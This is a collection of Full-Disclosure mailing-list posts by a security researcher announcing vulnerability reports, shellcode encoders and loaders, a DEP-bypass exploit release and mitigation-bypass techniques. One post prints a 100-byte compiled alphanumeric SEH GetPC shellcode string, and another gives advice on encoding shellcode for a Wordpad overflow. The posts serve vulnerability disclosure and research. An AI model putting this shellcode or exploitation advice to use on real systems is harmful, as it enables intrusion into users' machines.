[Full-disclosure] Bypassing Export address table Address Filter (EAF)
Hey list, If you're interested in a short analysis of Microsoft's new EAF pseudo-mitigation and how to bypass it, have a look here: http://skypher.com/index.php/2010/11/17/bypassing-eaf/ Cheers, SkyLined Berend-Jan Wever Delft, The Netherlands http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Java OBJECT children property memory corruption
Goedemiddag, Oracle has released a patch for a vulnerability in Java 6 that I reported to them. If you like to know more, you can read about it here: http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/ Cheers, SkyLined Berend-Jan Wever Delft, The Netherlands http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Windows Media Player memory corruption
Goedemiddag, Microsoft has released a patch for a vulnerability in Windows Media Player plugin that I reported to them. If you like to know more, you can read about it here: http://skypher.com/index.php/2010/10/12/issue-21-wmp-memory-corruption-using-popups/ Cheers, SkyLined <http://skypher.com/index.php/2010/10/12/issue-21-wmp-memory-corruption-using-popups/> Berend-Jan Wever Delft, The Netherlands http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gödel and kernel backdoors
nevermind the fact that a "good" program in your list may contain as yet unknown vulnerabilities which mean it's actually bad. On Sep 19, 2010 7:08 PM, "Georgi Guninski" wrote: > On Sun, Sep 19, 2010 at 06:21:35PM +0200, Pavel Kankovsky wrote: >> On the other hand, It is possible to "detect all bad programs" if it is >> allowed to err on the safe side and mistake some good programs for bad >> programs. An extreme example is to call all programs bad unless their >> exact code appears on the list of known good programs. >> > > > i doubt this can be remotely implemented in practice because of dynamic code like |eval| and mobile code. > > can |code| be realistically distinguished from |data| for current OSes > (e.g. is a vim modeline *only a* plain string or a string + program) ? > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Issue 17 - Msxml2.XMLHTTP.3.0 response handling memory corruption (ms10-051, CVE-2010-2561)
Just facts, no marketing (sorry Alex :P). Microsoft advisory: http://www.microsoft.com/technet/security/bulletin/ms10-051.mspx Blog post/discussion: http://skypher.com/index.php/2010/08/10/ms10-051/ <http://skypher.com/index.php/2010/08/10/ms10-051/>Timeline, details and repro: http://code.google.com/p/skylined/issues/detail?id=17 Cheers, SkyLined <http://skypher.com/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wordpad Command line argument vulnerability is it known ?
This is very probably known and fixed, as I published about the many BoFs and formatstring vulns in comand line handling in Windows applications in 2004 (http://seclists.org/bugtraq/2004/Oct/45), after which most if not all of them got fixed. I cannot reproduce in XP sp3. If you still want to exploit it, why don't you encode your shellcode to lowercase alphanumeric using ALPHA3? http://code.google.com/p/alpha3/ Berend-Jan Wever http://skypher.com/SkyLined On Wed, Mar 17, 2010 at 3:20 PM, sachin shinde wrote: > hi, > > > There is classic buffer/Stack overflow in wordpad.exe testing on winxp > sp 2.(is it already known?) > > on text console wordpad.exe takes argument as a filename and there it > happens. > > but writing shellcode for it is very hard,Because wordpad changes > uppercase chars to lower case chars. if anyone any idea about this > please reply! > > Though it looks like local vulnerability we can trigger it remotely > with ActiveX and Javascript.I can give full demonstration but cant > write shellcode because of too many bad characters( of course can show > you int 3 (0xcc)) but would like 2 show the full proof of concept > demonstration. > > > Regards, > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] To Ryan Naraine
(If you are not Ryan Naraine, you can stop reading now - sorry for the noize). Hey Ryan, I've tried to contact you through the link on http://blogs.zdnet.com/security/?p=5573 about the contents of that post, but I have not heard from you. There are some factual errors in that post that I thought you may want to correct, otherwise people might get the impression that you do not know what you're talking about or are trying to make a big story out of the release of a 5 year old exploit. I assume you missed my previous email that expanded on my original post to fix these misunderstandings, so if you read this, send me an email and I'll get you up to speed. Cheers and thanks, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP
It seems my English is not as good as I thought and I accidentally led Ryan Naraine <http://blogs.zdnet.com/security/?p=5573>, Larry Seltzer<http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/#comments> and probably others to come to conclusions such as that I released a weaponized 0-day that bypasses both ASLR+DEP in current versions of MSIE and Windows using a completely new technique and that I did so as a Google employee. However, let me try to explain better and to correct any ambiguity I may have created in my first blog post: - I have recently released an exploit that I developed in 2005 (before I was employed by either MS or Google). - I am releasing this as an individual as part of my new-years resolution<http://skypher.com/index.php/2010/01/02/new-years-resolutions/> to dump random stuff from my harddisk onto the tubes. (I have a personal interest in security outside of my work, every now and then I find enough time to work on and release stuff like this). - The exploit targets a bug that was fixed in 2005<http://skypher.com/wiki/index.php?title=Www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php>, that only affected MSIE 6.0 and earlier. - The exploit shows how to implement the well known ret-into-libc technique (using a heap spray) to bypass DEP. - The exploit does not contain anything that is not already public, other than how to implement a ret-into-libc using a heap-spray to exploit complex memory corruption bugs such as the DHTML race condition it targets. - The exploit does not bypass ASLR. - Using ret-into-libc to bypass DEP affects any application that has a vulnerability that allows an attacker to use a ret-into-libc attack - this is not MSIE specific. I hope this helps clarify some things. But, not being a native English speaker, I may inadvertently have said things completely wrong again. I look forward to correcting my mistakes as they show up on other news sites in the future. Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined On Mon, Mar 1, 2010 at 4:51 PM, Berend-Jan Wever wrote: > Hey all, > > I released a version of my Internet Exploiter 2 exploit from 2005 that > bypasses DEP. If you are familiar with my Internet Exploiter series of > exploits and/or are interested in how to use heap-spraying to bypass DEP, > you may like this: > http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/ > > Cheers, > SkyLined > <http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/> > Berend-Jan Wever > http://skypher.com/SkyLined > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Exploiter 2 - bypassing DEP
Hey all, I released a version of my Internet Exploiter 2 exploit from 2005 that bypasses DEP. If you are familiar with my Internet Exploiter series of exploits and/or are interested in how to use heap-spraying to bypass DEP, you may like this: http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/ Cheers, SkyLined <http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google offers up to $1337 for select Chromium vulnerabilities
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html *"Today, we are introducing an experimental new incentive for external researchers to participate. We will be rewarding select interesting and original vulnerabilities reported to us by the security research community. For existing contributors to Chromium security — who would likely continue to contribute regardless — this may be seen as a token of our appreciation. In addition, we are hoping that the introduction of this program will encourage new individuals to participate in Chromium security. The more people involved in scrutinizing Chromium's code and behavior, the more secure our millions of users will be. Such a concept is not new; we'd like to give serious kudos to the folks at Mozilla for their long-running and successful vulnerability reward program. Any bug filed through the Chromium bug tracker (under the template "Security Bug") will qualify for consideration."* Note that this does not mean that *all** *bugs reported as vulnerabilities get rewarded: *"**Q) What bugs are eligible?* *A) Any security bug may be considered. We will typically focus on **High and Critical impact bugs*<http://dev.chromium.org/developers/severity-guidelines> *, but any clever vulnerability at any severity might get a reward. Obviously, your bug won't be eligible if you worked on the code or review in the area in question."* Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
How about rebranding to ZID, as in Zero Information Disclosures? Berend-Jan Wever http://skypher.com/SkyLined On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures < zdi-disclosu...@tippingpoint.com> wrote: > ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update > Remote Code Execution Vulnerability > http://www.zerodayinitiative.com/advisories/ZDI-10-011 > January 21, 2010 > > -- CVE ID: > CVE-2010-0244 > > -- Affected Vendors: > Microsoft > > -- Affected Products: > Microsoft Internet Explorer > > -- Vulnerability Details: > This vulnerability allows remote attackers to execute arbitrary code on > vulnerable installations of Microsoft Internet Explorer. User > interaction is required to exploit this vulnerability in that the target > must visit a malicious page. > > The specific flaw exists when a Col element is used within an HTML table > container. If this element is removed while the table is in use a cache > that exists of the table's cells will be used after one of it's elements > has been invalidated. This can lead to code execution under the context > of the currently logged in user. > > -- Vendor Response: > Microsoft has issued an update to correct this vulnerability. More > details can be found at: > > http://www.microsoft.com/technet/security/Bulletin/MS10-jan.mspx > > -- Disclosure Timeline: > 2009-07-14 - Vulnerability reported to vendor > 2010-01-21 - Coordinated public release of advisory > > -- Credit: > This vulnerability was discovered by: >* wushi of team509 > > -- About the Zero Day Initiative (ZDI): > Established by TippingPoint, The Zero Day Initiative (ZDI) represents > a best-of-breed model for rewarding security researchers for responsibly > disclosing discovered vulnerabilities. > > Researchers interested in getting paid for their security research > through the ZDI can find more information and sign-up at: > >http://www.zerodayinitiative.com > > The ZDI is unique in how the acquired vulnerability information is > used. TippingPoint does not re-sell the vulnerability details or any > exploit code. Instead, upon notifying the affected product vendor, > TippingPoint provides its customers with zero day protection through > its intrusion prevention technology. Explicit details regarding the > specifics of the vulnerability are not exposed to any parties until > an official vendor patch is publicly available. Furthermore, with the > altruistic aim of helping to secure a broader user base, TippingPoint > provides this vulnerability information confidentially to security > vendors (including competitors) who have a vulnerability protection or > mitigation product. > > Our vulnerability disclosure policy is available online at: > >http://www.zerodayinitiative.com/advisories/disclosure_policy/ > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes
Two NULL pointer crashes, they do not affect MSIE 8.0. Repros can be found here: http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/ Cheers, SkyLined <http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Download and LoadLibrary shellcode released
For those interested in shellcode: download and LoadLibrary shellcode has some benefits over download & execute shellcode. Read more about it here: http://skypher.com/index.php/2010/01/11/download-and-loadlibrary-shellcode-released/ Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Testival released
During shellcode development, it makes sense to have a program that can easily load your shellcode at a controlable location, allows you to set registers and memory to certain values and execute the shellcode by setting EIP through a RET or CALL instruction. The Testival <http://code.google.com/p/testival/> project aims to do all those things and more: it also allows you to test ret-into-libc attacks, set the type of memory allocation you want (RWEflags, etc…), report exceptions in your code to stdout as well as load DLLs to test shellcode in DllMain. Testival is used by ALPHA3 <http://code.google.com/p/alpha3/> for automatically testing if all the en-/decoders work. Testival requires SkyBuild <http://code.google.com/p/skybuild/> to automatically build all files. Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ALPHA3 released
ALPHA3<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3>, an alphanumeric shellcode encoder, has been released: Improvements from ALPHA2<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2>to ALPHA3: - Smaller decoder stubs<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/IMUL_0x30_encoding> . - x64<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/x64_printable_opcodes>support (mixedcase ascii only). - x86<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/x86_printable_opcodes>lowercase ascii support. - latin-1 CALL GetPC<http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC> - x86 mixedcase ascii Countslide GetPC<http://skypher.com/index.php/2010/01/02/countslide-alphanumeric-getpc/>implementation - x86 mixedcase ascii SEH GetPC<http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC>for XPSP3 (bypass all SafeSEH mitigations). - More decoders for more types of base address sources. Blog post: http://skypher.com/index.php/2010/01/10/alpha3-released/ Project homepage: http://code.google.com/p/alpha3/ Download: http://alpha3.googlecode.com/files/ALPHA3.zip Cheers, SkyLined <http://skypher.com/index.php/2010/01/10/alpha3-released/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Countslide alphanumeric GetPC
One limitation of most alphanumeric shellcode decoders, including those in * ALPHA2<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2> * and the soon-to-be-released *ALPHA3<http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3> * is that they need to know where they are located in memory in order to decode themselves and run correctly. This makes using a *nopslide* hard in most circumstances, because you mostly only need a *nopslide* if you do not know exactly where your shellcode is in memory to begin with. I've developed a way to get around this problem, which I've described in more detail here: http://skypher.com/index.php/2010/01/02/countslide-alphanumeric-getpc/ ALPHA3 has support for generating working alphanumeric shellcode with nopslides using this technique. I'm currently working on getting the rest of its code into releasable shape. Cheers, SkyLined <http://skypher.com/index.php/2010/01/02/countslide-alphanumeric-getpc/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BETA3 released
Happy New Year! As part of my New Year's resolutions<http://skypher.com/index.php/2010/01/02/new-years-resolutions/>, I am releasing some tools that I never got around to finish and/or publish. First on the list is BETA3 <http://code.google.com/p/beta3/>, a multi-format shellcode encoding tool that can convert raw binary shellcode into text that can be used in exploit source-code. It can convert raw binary data to a large number of encodings. It can also do the reverse: decode encoded data into binary for the same types of encodings. This is the follow-up to BETA2<http://www.milw0rm.com/exploits/656> . http://skypher.com/index.php/2010/01/02/beta3-released/ Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MSIE Content-Encoding: deflate memory corruption vulnerability
Microsoft bulletin: http://www.microsoft.com/technet/security/bulletin/MS09-054.mspx Short description and repro information: http://skypher.com/index.php/2009/10/13/ms09-054cve-2009-1547-data-stream-header-corruption-vulnerability/ Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined <http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/> Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
FYI: ASLR & DEP can be bypassed on x86, there's just nothing public at the moment. Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote: > Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no > DEP/ASLR there... But as you said, so far there's no known "catch-all" > technique against IE8. > Along with other security features ( > http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) > this basicly means that IE8 is the most secure web browser nowadays? > > On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote: > >> I'm not aware of any catch-all technique just for IE8, though there are >> a few common ones like return oriented programming. Application >> specific techniques are also common when third party extensions are >> involved. >> >> -- >> __ >> Jared D. DeMott >> Principal Security Researcher >> >> > > > -- > Best wishes, > Freddie Vicious > http://twitter.com/viciousf > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Alphanumeric ASCII SEH GetPC for XP up to sp3
Hi all, I have released an updated version of my alphanumeric ASCII SEH GetPC code which works on Windows XP up to and including sp3: http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA3/x86/ASCII/Mixedcase/SEH_GetPC_(XP_sp3) It bypasses the mitigations that stopped my previous SEH GetPC by generating the SEH handler on the heap rather than the stack. NB. It still requires that the process is running with hardware DEP disabled or that you find a way to make the heap memory executable. This is the compiled code (100 bytes): V34djPXP4Hd30V3v034dYV34014dZX4vP4v4PHPfh11DX5PRRRV34dNj334d3D241D24XXfX3D28f1D28jAXLX3Dqh3Tpl1Tpl96 Quick intro to GetPC code: http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC Thanks, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS09-014: MSIE EMBED element race condition memory corruption
Some details + repro: http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption/ Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
...sigh This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I reported to Mozilla in September of 2009. It is a NULL ptr DoS, there is no "exploit" in the sense of executing arbitrary code, just a "repro" that can trigger a crash. The repro provided by Carl is the exact same repro I provided to Mozilla. Incidentally, Carl has report this exact same bug before: http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is how the repro got on milw0rm in the first place (http://milw0rm.com/exploits/8091). Aditya K Sood later submitted the repro (slightly modified) to milw0rm as his code as well (http://milw0rm.com/exploits/8219). Some say plagiarism is the sincerest form of flattery, so I guess I'll start obfuscating my repros into ASCII art that says "SkyLined" to prevent any more people from flattering me. Cheers, Sky Berend-Jan Wever http://skypher.com/SkyLined On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick wrote: > I found an unpatched vulnerability in the latest Firefox 3.0.8 allows > a remote attacker to cause a DoS. > A 0-day exploit is available here: > > http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] w32 SEH omelet shellcode stage
Hey all, I'm releasing some code for a technique which I call "omelet shellcode" that may be useful in some exploits. It is similar to egg-hunt shellcode, but will search user-land address space for multiple smaller eggs and recombine them into one larger block of shellcode and execute it. This is useful in situation where you cannot inject a block of sufficient size into a target process to store your shellcode in one piece, but you can inject multiple smaller blocks and execute one of them. More details can be found here: http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode http://code.google.com/p/w32-seh-omelet-shellcode/ I have not had a chance to test this newer version in a live exploit, so do let me know if you have a chance to use it. Cheers, SkyLined Berend-Jan Wever .. , , , ( ' / / . _ _ __/ , `'-._ /_-'/ / / / / ) /_) / / ()/` )(_/ / / / / (__ (_/ `--'__/ '---' http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState
Sorry, something went wrong while copy+pasting the repro URL: http://skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html Berend-Jan Wever http://skypher.com On Wed, Jan 7, 2009 at 6:04 PM, Berend-Jan Wever wrote: > This bug was reported by me to Mozilla in September. It is DoS > only.<https://bugzilla.mozilla.org/show_bug.cgi?id=456727> > https://bugzilla.mozilla.org/show_bug.cgi?id=456727 > > > https://bugzilla.mozilla.org/skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read%5b0...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html > > > How about giving some credit where it's due? > > Cheers, > SkyLined > > > ------------ > Berend-Jan Wever http://skypher.com > > > > > On Wed, Jan 7, 2009 at 4:53 PM, carl hardwick wrote: > >> An unpatched security flaw has been discovered in the latest version >> of Firefox 3.0.5 which allows a remote attacker to crash the browser >> with a special crafted HTML page using a queryCommandState: >> >> PoC: >> http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState
This bug was reported by me to Mozilla in September. It is DoS only.<https://bugzilla.mozilla.org/show_bug.cgi?id=456727> https://bugzilla.mozilla.org/show_bug.cgi?id=456727 https://bugzilla.mozilla.org/skypher.com/SkyLined/Repro/FireFox/FireFox%203.0.1%20(Build%202008070208)%20av-read%5b0...@xul!jvm_maybeshutdownliveconnect+0xdbe0/repro.html How about giving some credit where it's due? Cheers, SkyLined -------- Berend-Jan Wever http://skypher.com On Wed, Jan 7, 2009 at 4:53 PM, carl hardwick wrote: > An unpatched security flaw has been discovered in the latest version > of Firefox 3.0.5 which allows a remote attacker to crash the browser > with a special crafted HTML page using a queryCommandState: > > PoC: > http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MSIE screen[""] NULL ptr Read AV DoS details
NULL ptr Read AV DoS affecting MSIE 6.0, 7.0 and 8.0 (beta). Reported to MS; should be fixed in 8.0 rc1. http://skypher.com/index.php/2009/01/07/msie-screen-null-ptr-dos-details/ No script kiddies, you cannot download and execute with this one. Why don't you give your money to charity rather than offer it to me to write you an exploit? Then again, I do find your emails amusing... Cheers, SkyLined Berend-Jan Wever http://skypher.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2008-2303 proof of concept and more
CVE-2008-2303 covers an integer overflow in the handling of indices in the "arguments" array in Apple Safari that affects iPhone, iPod and PC (Mac and Windows). It was fixed in Safari 3.2 for iPhone and iPod in July and for PC in November. More details here: http://support.apple.com/kb/HT3298 Simple repro: http:// skypher .com/ SkyLined / Repro /Safari/arguments%5B0x8%5D/ repro .html I have also created proof of concept code that shows potential exploitability and demonstrates how to use heap-spraying in Safari. AFAIK this is the first use of heap spraying in Safari, but I may be wrong. Heap spraying in Safari is not that different from other browsers, just backwards ;) http://skypher.com/SkyLined/Repro/Safari/arguments%5B0x8%5D/poc.html No, script-kiddies, it is not a working "insert download and execute code here" exploit - view source for the win!! I have created a list of software vulnerabilities, including previously unreleased material, on my website: http://skypher.com/wiki/index.php?title=List_of_software_vulnerabilities Cheers, SkyLined ------------ Berend-Jan Wever http://skypher.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List of security teams contact information
Hey all, I've created a list with contact information for various security teams: http://skypher.com/wiki/index.php?title=List_of_security_teams_contact_information I hope this makes informing vendors about security issues easier. If you have any additional information or spot an error, let me know. Cheers, SkyLined Berend-Jan Wever http://skypher.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] StumbleUpon XSS (fixed)
Hi all, I found an XSS issue in StumbleUpon, which has been fixed. If you're interested in what the problem was, look here: http://skypher.com/ What I found most interesting about this case is that there were only 40 minutes between the acknowledgement of receipt of my email about the issue and their fix being online. In my experience that is really, really fast! Cheers, SkyLined Berend-Jan Wever <[EMAIL PROTECTED]> http://skypher.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASCII Art shellcode
Hi all, I've put some more stuff online I created in the last two years; ASCII Art shellcode: http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Organic *http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Blocky*<http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Blocky> http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Julia As the name suggests, it is working shellcode that's also ASCII Art. They all use the same basic principle: a small decoder embeded into the first characters of the ASCII Art. After the decoder, the original shellcode is encoded into the remainder of the ASCII Art. When executed, the decoder decodes the original shellcode and runs it, similar to how my ALPHA2 alphanumeric shellcode works. If you are going to release an exploit, you might as well make it look good. Cheers, SkyLined -------- Berend-Jan Wever <[EMAIL PROTECTED]> http://skypher.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Alphanumeric shellcode improvements
Hi all, I've not had as much opportunity in the last three years to contribute, but I do have some new stuff: I've decided to pre-release some parts of ALPHA3, the upcoming new version of my alphanumeric shellcode encoder: * I've reduced the size of the mixedcase ascii decoder: http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86 * I've created a lowercase ascii decoder: http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86 * I've created a mixedcase ascii decoder for x64: http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64 See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and some documentation. Cheers, SkyLined -- Berend-Jan "SkyLined" Wever Email & Live messenger: [EMAIL PROTECTED] -- 'The historical abuses of new data occurred between the time that a few people learned the important thing and the time when that important thing became general knowledge. To the Gowachin and to BuSab it was the "Data Gap," a source of constant danger.' -- Frank Herbert, 'The Dosadi Experiment' ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] First cross-domain XSS worm (not)
